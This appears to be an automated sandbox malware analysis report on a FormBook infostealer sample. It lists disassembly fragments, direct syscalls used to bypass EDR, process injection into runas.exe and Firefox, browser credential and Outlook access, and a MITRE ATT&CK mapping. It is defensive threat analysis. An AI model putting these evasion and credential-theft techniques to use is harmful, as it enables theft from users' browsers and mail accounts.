        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EBDE0 mov eax, dword ptr fs:[00000030h]3_2_356EBDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570FDE0 mov eax, dword ptr fs:[00000030h]3_2_3570FDE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7DB6 mov eax, dword ptr fs:[00000030h]3_2_356E7DB6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DDDB0 mov eax, dword ptr fs:[00000030h]3_2_356DDDB0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov ecx, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov ecx, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov ecx, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov ecx, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov ecx, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov ecx, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C60 mov eax, dword ptr fs:[00000030h]3_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571BC6E mov eax, dword ptr fs:[00000030h]3_2_3571BC6E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571BC6E mov eax, dword ptr fs:[00000030h]3_2_3571BC6E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35763C57 mov eax, dword ptr fs:[00000030h]3_2_35763C57
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DDC40 mov eax, dword ptr fs:[00000030h]3_2_356DDC40
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C40 mov eax, dword ptr fs:[00000030h]3_2_356F3C40
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A5C38 mov eax, dword ptr fs:[00000030h]3_2_357A5C38
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A5C38 mov ecx, dword ptr fs:[00000030h]3_2_357A5C38
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C20 mov eax, dword ptr fs:[00000030h]3_2_356F3C20
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35777C38 mov eax, dword ptr fs:[00000030h]3_2_35777C38
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7CF1 mov eax, dword ptr fs:[00000030h]3_2_356D7CF1
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3CF0 mov eax, dword ptr fs:[00000030h]3_2_356E3CF0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E3CF0 mov eax, dword ptr fs:[00000030h]3_2_356E3CF0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773CD4 mov eax, dword ptr fs:[00000030h]3_2_35773CD4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773CD4 mov eax, dword ptr fs:[00000030h]3_2_35773CD4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773CD4 mov ecx, dword ptr fs:[00000030h]3_2_35773CD4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773CD4 mov eax, dword ptr fs:[00000030h]3_2_35773CD4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35773CD4 mov eax, dword ptr fs:[00000030h]3_2_35773CD4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35765CD0 mov eax, dword ptr fs:[00000030h]3_2_35765CD0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EFCC9 mov eax, dword ptr fs:[00000030h]3_2_356EFCC9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDCD1 mov eax, dword ptr fs:[00000030h]3_2_356FDCD1
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDCD1 mov eax, dword ptr fs:[00000030h]3_2_356FDCD1
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDCD1 mov eax, dword ptr fs:[00000030h]3_2_356FDCD1
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35719CCF mov eax, dword ptr fs:[00000030h]3_2_35719CCF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789C98 mov ecx, dword ptr fs:[00000030h]3_2_35789C98
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789C98 mov eax, dword ptr fs:[00000030h]3_2_35789C98
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789C98 mov eax, dword ptr fs:[00000030h]3_2_35789C98
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789C98 mov eax, dword ptr fs:[00000030h]3_2_35789C98
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7C85 mov eax, dword ptr fs:[00000030h]3_2_356D7C85
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7C85 mov eax, dword ptr fs:[00000030h]3_2_356D7C85
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7C85 mov eax, dword ptr fs:[00000030h]3_2_356D7C85
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7C85 mov eax, dword ptr fs:[00000030h]3_2_356D7C85
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D7C85 mov eax, dword ptr fs:[00000030h]3_2_356D7C85
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579FC95 mov eax, dword ptr fs:[00000030h]3_2_3579FC95
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35763C80 mov ecx, dword ptr fs:[00000030h]3_2_35763C80
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7C95 mov eax, dword ptr fs:[00000030h]3_2_356E7C95
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7C95 mov eax, dword ptr fs:[00000030h]3_2_356E7C95
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DBF70 mov eax, dword ptr fs:[00000030h]3_2_356DBF70
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1F70 mov eax, dword ptr fs:[00000030h]3_2_356E1F70
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35783F54 mov eax, dword ptr fs:[00000030h]3_2_35783F54
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35783F54 mov eax, dword ptr fs:[00000030h]3_2_35783F54
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579BF4D mov eax, dword ptr fs:[00000030h]3_2_3579BF4D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDF36 mov eax, dword ptr fs:[00000030h]3_2_356FDF36
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDF36 mov eax, dword ptr fs:[00000030h]3_2_356FDF36
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDF36 mov eax, dword ptr fs:[00000030h]3_2_356FDF36
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDF36 mov eax, dword ptr fs:[00000030h]3_2_356FDF36
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DFF30 mov edi, dword ptr fs:[00000030h]3_2_356DFF30
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575FF03 mov eax, dword ptr fs:[00000030h]3_2_3575FF03
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575FF03 mov eax, dword ptr fs:[00000030h]3_2_3575FF03

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtCreateFile: Direct from: 0x779D2F0CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtAllocateVirtualMemory: Direct from: 0x779D3BBCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtSetInformationThread: Direct from: 0x779C6319Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtQueryInformationToken: Direct from: 0x779D2BCCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtOpenFile: Direct from: 0x779D2CECJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtReadVirtualMemory: Direct from: 0x779D2DACJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtAllocateVirtualMemory: Direct from: 0x779D480CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtWriteVirtualMemory: Direct from: 0x779D482CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtClose: Direct from: 0x779D2A8C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtSetInformationThread: Direct from: 0x779D2A6CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtCreateKey: Direct from: 0x779D2B8CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtQueryAttributesFile: Direct from: 0x779D2D8CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtQueryVolumeInformationFile: Direct from: 0x779D2E4CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtDeviceIoControlFile: Direct from: 0x779D2A0CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtQuerySystemInformation: Direct from: 0x779D47ECJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtAllocateVirtualMemory: Direct from: 0x779D2B0CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtOpenSection: Direct from: 0x779D2D2CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtProtectVirtualMemory: Direct from: 0x779C7A4EJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtDelayExecution: Direct from: 0x779D2CFCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtOpenKeyEx: Direct from: 0x779D2ABCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtQueryInformationProcess: Direct from: 0x779D2B46Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtResumeThread: Direct from: 0x779D2EDCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtProtectVirtualMemory: Direct from: 0x779D2EBCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtCreateUserProcess: Direct from: 0x779D363CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtSetInformationProcess: Direct from: 0x779D2B7CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtWriteVirtualMemory: Direct from: 0x779D2D5CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtNotifyChangeKey: Direct from: 0x779D3B4CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtAllocateVirtualMemory: Direct from: 0x779D2B1CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtResumeThread: Direct from: 0x779D35CCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtMapViewOfSection: Direct from: 0x779D2C3CJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtReadFile: Direct from: 0x779D29FCJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeNtQuerySystemInformation: Direct from: 0x779D2D1CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: NULL target: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\runas.exeThread register set: target process: 3652Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\runas.exeThread APC queued: target process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeJump to behavior
        Uses runas.exe to run programs with evaluated privileges
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager(V
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004033A2 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A2

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		12
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
